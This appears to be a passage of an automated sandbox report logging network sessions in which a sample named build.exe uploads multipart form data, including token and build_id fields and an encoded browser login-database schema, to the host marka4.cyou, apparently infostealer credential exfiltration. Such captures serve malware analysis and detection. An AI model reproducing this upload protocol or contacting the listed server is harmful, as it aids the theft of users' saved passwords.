2025-01-11 22:00:17 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 22:00:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-11 22:00:17 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49766	116.203.166.124	443	7144	C:\Users\user\Desktop\build.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 22:00:17 UTC	279	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----89hl6xba1n7ymy589hlx User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: marka4.cyou Content-Length: 213453 Connection: Keep-Alive Cache-Control: no-cache
2025-01-11 22:00:17 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 38 39 68 6c 36 78 62 61 31 6e 37 79 6d 79 35 38 39 68 6c 78 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 62 39 64 33 64 30 62 34 64 36 34 65 64 66 38 32 65 36 39 63 64 63 31 35 38 62 34 36 31 64 65 0d 0a 2d 2d 2d 2d 2d 2d 38 39 68 6c 36 78 62 61 31 6e 37 79 6d 79 35 38 39 68 6c 78 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 64 39 63 30 33 64 66 63 63 31 37 65 33 63 31 62 65 39 61 63 61 62 34 31 30 30 61 36 39 35 30 0d 0a 2d 2d 2d 2d 2d 2d 38 39 68 6c 36 78 62 61 31 6e 37 79 6d 79 35 38 39 68 6c 78 0d 0a 43 6f 6e 74 Data Ascii: ------89hl6xba1n7ymy589hlxContent-Disposition: form-data; name="token"7b9d3d0b4d64edf82e69cdc158b461de------89hl6xba1n7ymy589hlxContent-Disposition: form-data; name="build_id"7d9c03dfcc17e3c1be9acab4100a6950------89hl6xba1n7ymy589hlxCont
2025-01-11 22:00:17 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:17 UTC	16355	OUT	Data Raw: 41 59 69 43 78 45 41 41 51 59 42 44 51 51 49 41 77 67 49 44 51 67 49 43 41 67 4a 43 41 41 76 5a 58 64 45 74 42 69 33 43 71 41 41 41 41 59 34 6f 47 49 66 43 68 45 41 41 51 59 42 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 77 41 76 5a 58 64 45 74 42 69 33 43 59 41 41 41 41 59 66 43 52 45 41 41 51 59 42 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 67 41 76 5a 58 64 45 74 42 69 33 43 49 41 41 41 41 59 65 43 42 45 41 41 51 59 49 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 51 41 76 5a 58 64 45 74 42 69 33 45 41 41 41 42 69 49 48 45 51 41 42 42 67 45 4e 42 41 67 44 43 41 67 4e 43 41 67 49 43 41 6b 45 41 43 39 6c 5a 51 58 79 48 55 51 47 6f 41 41 41 42 67 50 73 35 42 38 47 45 51 41 42 42 67 45 4e 42 41 67 49 43 41 67 4e 43 41 67 49 43 41 6b 44 Data Ascii: AYiCxEAAQYBDQQIAwgIDQgICAgJCAAvZXdEtBi3CqAAAAY4oGIfChEAAQYBDQQICAgIDQgICAgJBwAvZXdEtBi3CYAAAAYfCREAAQYBDQQICAgIDQgICAgJBgAvZXdEtBi3CIAAAAYeCBEAAQYIDQQICAgIDQgICAgJBQAvZXdEtBi3EAAABiIHEQABBgENBAgDCAgNCAgICAkEAC9lZQXyHUQGoAAABgPs5B8GEQABBgENBAgICAgNCAgICAkD
2025-01-11 22:00:17 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:17 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:17 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:17 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:17 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:17 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:17 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:19 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 22:00:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49768	116.203.166.124	443	7144	C:\Users\user\Desktop\build.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 22:00:18 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----89hl6xba1n7ymy589hlx User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: marka4.cyou Content-Length: 55081 Connection: Keep-Alive Cache-Control: no-cache
2025-01-11 22:00:18 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 38 39 68 6c 36 78 62 61 31 6e 37 79 6d 79 35 38 39 68 6c 78 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 62 39 64 33 64 30 62 34 64 36 34 65 64 66 38 32 65 36 39 63 64 63 31 35 38 62 34 36 31 64 65 0d 0a 2d 2d 2d 2d 2d 2d 38 39 68 6c 36 78 62 61 31 6e 37 79 6d 79 35 38 39 68 6c 78 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 64 39 63 30 33 64 66 63 63 31 37 65 33 63 31 62 65 39 61 63 61 62 34 31 30 30 61 36 39 35 30 0d 0a 2d 2d 2d 2d 2d 2d 38 39 68 6c 36 78 62 61 31 6e 37 79 6d 79 35 38 39 68 6c 78 0d 0a 43 6f 6e 74 Data Ascii: ------89hl6xba1n7ymy589hlxContent-Disposition: form-data; name="token"7b9d3d0b4d64edf82e69cdc158b461de------89hl6xba1n7ymy589hlxContent-Disposition: form-data; name="build_id"7d9c03dfcc17e3c1be9acab4100a6950------89hl6xba1n7ymy589hlxCont
2025-01-11 22:00:18 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:18 UTC	16355	OUT	Data Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:18 UTC	6016	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:19 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 22:00:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-11 22:00:19 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49770	116.203.166.124	443	7144	C:\Users\user\Desktop\build.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 22:00:19 UTC	279	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----16pp890hdjm7qq1v3oh4 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: marka4.cyou Content-Length: 142457 Connection: Keep-Alive Cache-Control: no-cache
2025-01-11 22:00:19 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 31 36 70 70 38 39 30 68 64 6a 6d 37 71 71 31 76 33 6f 68 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 62 39 64 33 64 30 62 34 64 36 34 65 64 66 38 32 65 36 39 63 64 63 31 35 38 62 34 36 31 64 65 0d 0a 2d 2d 2d 2d 2d 2d 31 36 70 70 38 39 30 68 64 6a 6d 37 71 71 31 76 33 6f 68 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 64 39 63 30 33 64 66 63 63 31 37 65 33 63 31 62 65 39 61 63 61 62 34 31 30 30 61 36 39 35 30 0d 0a 2d 2d 2d 2d 2d 2d 31 36 70 70 38 39 30 68 64 6a 6d 37 71 71 31 76 33 6f 68 34 0d 0a 43 6f 6e 74 Data Ascii: ------16pp890hdjm7qq1v3oh4Content-Disposition: form-data; name="token"7b9d3d0b4d64edf82e69cdc158b461de------16pp890hdjm7qq1v3oh4Content-Disposition: form-data; name="build_id"7d9c03dfcc17e3c1be9acab4100a6950------16pp890hdjm7qq1v3oh4Cont
2025-01-11 22:00:19 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:19 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
